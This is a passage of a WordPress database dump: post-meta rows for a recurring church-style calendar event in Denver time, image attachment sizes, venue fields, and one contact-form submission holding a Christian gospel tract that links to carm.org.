;i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151820,266081,'mec_start_time_hour','7'),(115546,262821,'_RTECregistrationsDisabled','1'),(115547,262821,'_RTECdeadlineType','start'),(115548,262821,'_RTECwhoCanRegister','any'),(115549,262821,'_RTEClimitRegistrations','0'),(115550,262821,'_RTECmaxRegistrations','30'),(115544,262821,'_EventOrigin','events-calendar'),(115551,262821,'boldgrid_hide_page_title','0'),(115552,262821,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115553,262821,'_EventShowMapLink','1'),(115542,262821,'protect_children',''),(115543,262821,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115541,262821,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115615,262824,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115319,262822,'_EventStartDate','2021-07-11 08:45:00'),(115320,262822,'_EventStartDateUTC','2021-07-11 14:45:00'),(115321,262822,'_EventEndDate','2021-07-11 10:00:00'),(115322,262822,'_EventEndDateUTC','2021-07-11 16:00:00'),(115323,262822,'_EventDuration','4500'),(117033,262881,'_EventOrigin','events-calendar'),(117034,262881,'_edit_lock','1619291892:2'),(115575,262822,'_EventShowMap','1'),(115576,262822,'_EventVenueID','262507'),(115577,262822,'_EventCurrencySymbol',''),(115578,262822,'_EventCurrencyPosition','prefix'),(115579,262822,'_EventCost',''),(115580,262822,'_EventURL',''),(115581,262822,'_EventTimezone','America/Denver'),(115582,262822,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115567,262822,'_RTECregistrationsDisabled','1'),(115568,262822,'_RTECdeadlineType','start'),(115569,262822,'_RTECwhoCanRegister','any'),(115570,262822,'_RTEClimitRegistrations','0'),(115571,262822,'_RTECmaxRegistrations','30'),(115565,262822,'_EventOrigin','events-calendar'),(115572,262822,'boldgrid_hide_page_title','0'),(115573,262822,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115574,262822,'_EventShowMapLink','1'),(115563,262822,'protect_children',''),(115564,262822,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115562,262822,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115616,262824,'_EventShowMapLink','1'),(115349,262823,'_EventStartDate','2021-08-08 08:45:00'),(115350,262823,'_EventStartDateUTC','2021-08-08 14:45:00'),(115351,262823,'_EventEndDate','2021-08-08 10:00:00'),(115352,262823,'_EventEndDateUTC','2021-08-08 16:00:00'),(115353,262823,'_EventDuration','4500'),(117035,262881,'_edit_last','2'),(115596,262823,'_EventShowMap','1'),(115597,262823,'_EventVenueID','262507'),(115598,262823,'_EventCurrencySymbol',''),(115599,262823,'_EventCurrencyPosition','prefix'),(115600,262823,'_EventCost',''),(115601,262823,'_EventURL',''),(115602,262823,'_EventTimezone','America/Denver'),(115603,262823,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151819,266081,'mec_start_date','2021-12-21'),(115588,262823,'_RTECregistrationsDisabled','1'),(115589,262823,'_RTECdeadlineType','start'),(115590,262823,'_RTECwhoCanRegister','any'),(115591,262823,'_RTEClimitRegistrations','0'),(115592,262823,'_RTECmaxRegistrations','30'),(115586,262823,'_EventOrigin','events-calendar'),(115593,262823,'boldgrid_hide_page_title','0'),(115594,262823,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 08:45:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 10:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115595,262823,'_EventShowMapLink','1'),(115584,262823,'protect_children',''),(115585,262823,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115583,262823,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511337;s:12:\"_EventOrigin\";i:1607511337;s:13:\"_thumbnail_id\";i:1607511337;s:26:\"_RTECregistrationsDisabled\";i:1607511337;s:17:\"_RTECdeadlineType\";i:1607511337;s:19:\"_RTECwhoCanRegister\";i:1607511337;s:23:\"_RTEClimitRegistrations\";i:1607511337;s:21:\"_RTECmaxRegistrations\";i:1607511337;s:24:\"boldgrid_hide_page_title\";i:1607511337;s:16:\"_EventRecurrence\";i:1607511337;s:17:\"_EventShowMapLink\";i:1607511337;s:13:\"_EventShowMap\";i:1607511337;s:13:\"_EventVenueID\";i:1607511337;s:20:\"_EventCurrencySymbol\";i:1607511337;s:22:\"_EventCurrencyPosition\";i:1607511337;s:10:\"_EventCost\";i:1607511337;s:9:\"_EventURL\";i:1607511337;s:14:\"_EventTimezone\";i:1607511337;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511337;s:16:\"tribe_events_cat\";i:1607536537;}'),(115617,262824,'_EventShowMap','1'),(115618,262824,'_EventVenueID','262507'),(115619,262824,'_EventCurrencySymbol',''),(115620,262824,'_EventCurrencyPosition','prefix'),(115621,262824,'_EventCost',''),(115379,262824,'_EventStartDate','2021-09-12 08:45:00'),(115622,262824,'_EventURL',''),(115380,262824,'_EventStartDateUTC','2021-09-12 14:45:00'),(115623,262824,'_EventTimezone','America/Denver'),(115381,262824,'_EventEndDate','2021-09-12 10:00:00'),(115382,262824,'_EventEndDateUTC','2021-09-12 16:00:00'),(115624,262824,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262816;a:2:{s:9:\"timestamp\";i:1610268300;s:8:\"duration\";i:4500;}i:262817;a:2:{s:9:\"timestamp\";i:1613292300;s:8:\"duration\";i:4500;}i:262818;a:2:{s:9:\"timestamp\";i:1615711500;s:8:\"duration\";i:4500;}i:262819;a:2:{s:9:\"timestamp\";i:1618130700;s:8:\"duration\";i:4500;}i:262820;a:2:{s:9:\"timestamp\";i:1620549900;s:8:\"duration\";i:4500;}i:262821;a:2:{s:9:\"timestamp\";i:1623573900;s:8:\"duration\";i:4500;}i:262822;a:2:{s:9:\"timestamp\";i:1625993100;s:8:\"duration\";i:4500;}i:262823;a:2:{s:9:\"timestamp\";i:1628412300;s:8:\"duration\";i:4500;}i:262824;a:2:{s:9:\"timestamp\";i:1631436300;s:8:\"duration\";i:4500;}i:262825;a:2:{s:9:\"timestamp\";i:1633855500;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115383,262824,'_EventDuration','4500'),(115609,262824,'_RTECregistrationsDisabled','1'),(115610,262824,'_RTECdeadlineType','start'),(115611,262824,'_RTECwhoCanRegister','any'),(115612,262824,'_RTEClimitRegistrations','0'),(115613,262824,'_RTECmaxRegistrations','30'),(11908,128250,'boldgrid_hide_page_title','0'),(26539,128298,'_edit_last','2'),(11910,128250,'_EventShowMapLink','1'),(11911,128250,'_EventShowMap','1'),(11912,128250,'_EventVenueID','51976'),(11913,128250,'_EventStartDate','2019-09-22 10:30:00'),(11914,128250,'_EventEndDate','2019-09-22 11:30:00'),(11915,128250,'_EventStartDateUTC','2019-09-22 16:30:00'),(11916,128250,'_EventEndDateUTC','2019-09-22 17:30:00'),(11917,128250,'_EventDuration','3600'),(11918,128250,'_EventCurrencySymbol',''),(11919,128250,'_EventCurrencyPosition','prefix'),(11920,128250,'_EventCost',''),(11921,128250,'_EventURL',''),(11922,128250,'_EventTimezone','America/Denver'),(11923,128250,'_EventTimezoneAbbr','MDT'),(24955,128250,'_EventNextPendingRecurrence','2021-09-26 10:30:00'),(11925,128250,'_dp_original','128132'),(11926,128250,'_edit_lock','1580490142:2'),(11927,128250,'_edit_last','2'),(27448,198745,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:342;s:6:\"height\";i:192;s:4:\"file\";s:22:\"2019/10/lake-bench.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"lake-bench-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"lake-bench-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:20:\"lake-bench-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:22:\"lake-bench-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:22:\"lake-bench-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:22:\"lake-bench-321x180.jpg\";s:5:\"width\";i:321;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:22:\"lake-bench-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11944,128298,'_EventStartDate','2019-10-27 10:30:00'),(11945,128298,'_EventStartDateUTC','2019-10-27 16:30:00'),(11946,128298,'_EventEndDate','2019-10-27 11:30:00'),(11947,128298,'_EventEndDateUTC','2019-10-27 17:30:00'),(11948,128298,'_EventDuration','3600'),(25586,128298,'_EventOrigin','events-calendar'),(25587,128298,'_EventOrigin','events-calendar'),(25588,128298,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";d:1568546882;s:13:\"_thumbnail_id\";d:1569787861;s:24:\"boldgrid_hide_page_title\";d:1568546882;s:16:\"_EventRecurrence\";d:1569787861;s:17:\"_EventShowMapLink\";d:1568546882;s:13:\"_EventShowMap\";d:1568546882;s:13:\"_EventVenueID\";d:1568546882;s:20:\"_EventCurrencySymbol\";d:1568546882;s:22:\"_EventCurrencyPosition\";d:1568546882;s:10:\"_EventCost\";d:1568546882;s:9:\"_EventURL\";d:1568546882;s:14:\"_EventTimezone\";d:1568546882;s:27:\"_EventNextPendingRecurrence\";d:1569636253;s:12:\"_dp_original\";d:1568546882;s:31:\"_TribeEventsPRO_RecurrenceQueue\";d:1568546882;s:20:\"_EventOriginalParent\";d:1568546882;s:11:\"post_parent\";d:1568546882;s:10:\"_edit_last\";d:1569787861;s:12:\"post_content\";d:1569787861;s:18:\"_EventTimezoneAbbr\";d:1569787861;s:10:\"post_title\";d:1569787933;}'),(25593,128298,'_EventShowMapLink','1'),(25594,128298,'_EventShowMap','1'),(25595,128298,'_EventVenueID','51976'),(25589,128298,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";d:1568546882;s:13:\"_thumbnail_id\";d:1569787861;s:24:\"boldgrid_hide_page_title\";d:1568546882;s:16:\"_EventRecurrence\";d:1569787861;s:17:\"_EventShowMapLink\";d:1568546882;s:13:\"_EventShowMap\";d:1568546882;s:13:\"_EventVenueID\";d:1568546882;s:20:\"_EventCurrencySymbol\";d:1568546882;s:22:\"_EventCurrencyPosition\";d:1568546882;s:10:\"_EventCost\";d:1568546882;s:9:\"_EventURL\";d:1568546882;s:14:\"_EventTimezone\";d:1568546882;s:27:\"_EventNextPendingRecurrence\";d:1569636253;s:12:\"_dp_original\";d:1568546882;s:31:\"_TribeEventsPRO_RecurrenceQueue\";d:1568546882;s:20:\"_EventOriginalParent\";d:1568546882;s:11:\"post_parent\";d:1568546882;s:10:\"_edit_last\";d:1569787861;s:12:\"post_content\";d:1569787861;s:18:\"_EventTimezoneAbbr\";d:1569787861;s:10:\"post_title\";d:1569787933;}'),(25585,128298,'_tribe_modified_fields','a:21:{s:12:\"_EventOrigin\";d:1568546882;s:13:\"_thumbnail_id\";d:1569787861;s:24:\"boldgrid_hide_page_title\";d:1568546882;s:16:\"_EventRecurrence\";d:1569787861;s:17:\"_EventShowMapLink\";d:1568546882;s:13:\"_EventShowMap\";d:1568546882;s:13:\"_EventVenueID\";d:1568546882;s:20:\"_EventCurrencySymbol\";d:1568546882;s:22:\"_EventCurrencyPosition\";d:1568546882;s:10:\"_EventCost\";d:1568546882;s:9:\"_EventURL\";d:1568546882;s:14:\"_EventTimezone\";d:1568546882;s:27:\"_EventNextPendingRecurrence\";d:1569636253;s:12:\"_dp_original\";d:1568546882;s:31:\"_TribeEventsPRO_RecurrenceQueue\";d:1568546882;s:20:\"_EventOriginalParent\";d:1568546882;s:11:\"post_parent\";d:1568546882;s:10:\"_edit_last\";d:1569787861;s:12:\"post_content\";d:1569787861;s:18:\"_EventTimezoneAbbr\";d:1569787861;s:10:\"post_title\";d:1569787933;}'),(25591,128298,'boldgrid_hide_page_title','0'),(26538,128298,'_edit_lock','1569809560:2'),(25596,128298,'_EventCurrencySymbol',''),(25597,128298,'_EventCurrencyPosition','prefix'),(25598,128298,'_EventCost',''),(25599,128298,'_EventURL',''),(25600,128298,'_EventTimezone','America/Denver'),(25601,128298,'_dp_original','128132'),(26431,128298,'_EventNextPendingRecurrence','2021-10-24 10:30:00'),(27447,198745,'_wp_attached_file','2019/10/lake-bench.jpg'),(160564,266604,'mec_reg_fields','a:0:{}'),(96803,262268,'_field_133','Guy'),(96804,262268,'_field_134','Nuela'),(96805,262268,'_field_135','guy.nuela@apex.net'),(96806,262268,'_field_137','The Gospel for everyone'),(96807,262268,'_field_138','The Gospel for everyone\n\n\nThe Gospel means good news. According to the Bible, there is one God who has revealed Himself in the person of Jesus Christ. Because God loves humans, He has revealed Jesus as the Savior for all people (1 Timothy 4:10).  \n\n\nChristianity is the religion based on the teachings of the historical person Jesus Christ and His followers. According to the Bible, there is one God who has revealed Himself in the person of Jesus. Jesus claimed to be divine. He came to save humans from the consequence of their sins which was death.\n\n\nGod\nAccording to Christianity, there is one God who has revealed Himself in the person of Jesus Christ. The One God coeternally exists as three distinct persons: Father, Son, and Holy Spirit.\n\n\nJesus Christ\nJesus Christ who is the second person in the Godhead who became man, lived a perfect life, died for the sins of the world, and rose from the grave. Since Jesus was God, whatever He said was true. The God-man Jesus taught that there was only one way to heaven. He said, “I am the way, the truth and the life. No one comes to the Father, but by Me (John 14:6).” \n\n\nJesus is not just one option among many paths to God. He is the only way of salvation. It is only through trusting Christ as one’s Savior that a person can receive forgiveness for their sins (Ephesians 1:13).\n\n\nThe Bad News – Sin \nThe law reflects the character of God. The bad news is that as humans, we have all sinned by rebelling against God’s standard of righteousness as revealed by His law. In God’s eyes, if we have told one lie, we are a liar. If we have stolen one thing, we are a thief. If we have looked with lust at a person, we are an adulterer. The Bible says, “There is none righteous, no not one (Romans 3:10-11).” In fact, if we were able to keep all of God’s commandments, but broke just one of them…it would still be as if we had broke all of them. James 2:10 says, “Whosoever shall keep the whole law, yet break one, he is guilty of breaking all of them.”\n\n\nBecause of our sinful rebellion against God, we are separated from God and deserve His eternal righteous judgment which is His wrath in hell (Revelation 20:15). All humans deserve an eternal hell for their willful rebellion against Him. We are not able to pay for our sins.\n\n\nThe Courtroom Analogy\nImagine that you committed a serious crime and you are standing before a judge in a court of law. The judge tells you, “You have committed a serious crime which cost the government 500,000 dollars in damage.” You reply, “Judge I know that I committed that crime, but I can’t pay for it. I do not have the money.” The judge will reply, “I am sorry, but your fine has to be paid for. If you cannot pay, you are going to have to go to prison.” As you stand there you begin to sweat and are extremely nervous. \n\n\nHowever, someone abruptly comes into the courtroom, walks up to the judge, and pulls out a checkbook. The person then writes a check to the judge for 500,000. The judge looks at you. He says, “This man has paid your fine. Here is the check.” The judge then extends the check to you. What do you have to do to make the check yours? You must simply receive it. This is the same thing with the gospel. We are all sinners. We stand before the only one true holy God. Our sin is so great that we cannot pay for it. \n\n\nThe Good News\nWhile humans are sinful and deserve hell, God the Father sent Jesus the Son to die for humans sins. The Bible says, “God demonstrates His loved towards us in that while we were yet sinners, Christ died for us.” The one true God Jesus did not die for good people He died for sinners. Since He was God, His death on the cross for our sins, had infinite value and was able to pay for all of our sins past, present, and future.\n\n\nThe good news is that Jesus did not die and stay dead. On the third day, He rose from the dead. He triumphed over the consequence of our sin which was death. As a result of His resurrection, He proved that His death on the cross was sufficient to pay for our sins before God the Father. The miracle of the resurrection also proved that He is able to save us and assure us of living eternally in heaven.\n\nOur Response\nDo you have any certainty that you enter into heaven when you die? Are your meditations and rituals actually going to help you with this process?\n\n\nJesus Christ came to give us hope. He said, “Come to Me, all who are weary and heavy-laden, and I will give you rest” (Matthew 11:28). He also said, “I tell you the truth, whoever hears my word and believes him who sent me has eternal life and will not be condemned; he has crossed over from death to life” (John 5:24). Jesus Christ offers you salvation from God’s judgment by faith. It is not by your works, but by faith that you can possess everlasting life (Ephesians 2:8-9; Romans 4:5; 5:1). This salvation you can possess immediately and with certainty due to the completed work of Jesus who was the unique God in flesh.\n\n\nSince Jesus paid for our sins, we must receive His free gift of salvation by faith. We must place our trust in Jesus Christ’s alone as our salvation before God. Our good works cannot save us.  You maybe religious, but are you righteous?  Do you have a right standing before God?\n\nDo you want to know for sure you are going to heaven when you die? Please visit this website:\n\nhttps://carm.org/how-do-i-become-christian\n\n'),(160563,266604,'mec_reg_fields_global_inheritance','1'),(160562,266604,'mec_ticket_variations','a:0:{}'),(160560,266604,'mec_fees','a:0:{}'),(160561,266604,'mec_ticket_variations_global_inheritance','1'),(160559,266604,'mec_fees_global_inheritance','1'),(97376,262305,'_VenuePhone',''),(97414,262066,'_EventTimezoneAbbr','MST'),(97413,262066,'_EventTimezone','America/Denver'),(97412,262066,'_EventURL',''),(97411,262066,'_EventCost',''),(97410,262066,'_EventCurrencyPosition','prefix'),(97400,262066,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(97401,262066,'_EventShowMapLink',''),(97402,262066,'_EventShowMap',''),(97403,262066,'_EventVenueID','262305'),(97404,262066,'_EventStartDate','2021-01-24 00:00:00'),(97405,262066,'_EventEndDate','2021-01-24 00:00:00'),(97406,262066,'_EventStartDateUTC','2021-01-24 07:00:00'),(97407,262066,'_EventEndDateUTC','2021-01-24 07:00:00'),(97408,262066,'_EventDuration','0'),(97409,262066,'_EventCurrencySymbol',''),(97378,262305,'_VenueStateProvince',''),(97379,262305,'_VenueOverwriteCoords','0'),(97380,262305,'boldgrid_hide_page_title','0'),(97371,262305,'_VenueCity',''),(97372,262305,'_VenueCountry',''),(97373,262305,'_VenueProvince',''),(97374,262305,'_VenueState',''),(97375,262305,'_VenueZip',''),(97364,262305,'_edit_lock','1607017180:2'),(97365,262305,'_edit_last','2'),(97366,262305,'_EventShowMapLink','1'),(97367,262305,'_EventShowMap','1'),(97368,262305,'_VenueShowMapLink','1'),(97369,262305,'_VenueShowMap','1'),(97370,262305,'_VenueAddress',''),(27446,198744,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:309;s:6:\"height\";i:206;s:4:\"file\";s:24:\"2019/10/kitty-flower.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"kitty-flower-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"kitty-flower-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:22:\"kitty-flower-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:24:\"kitty-flower-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\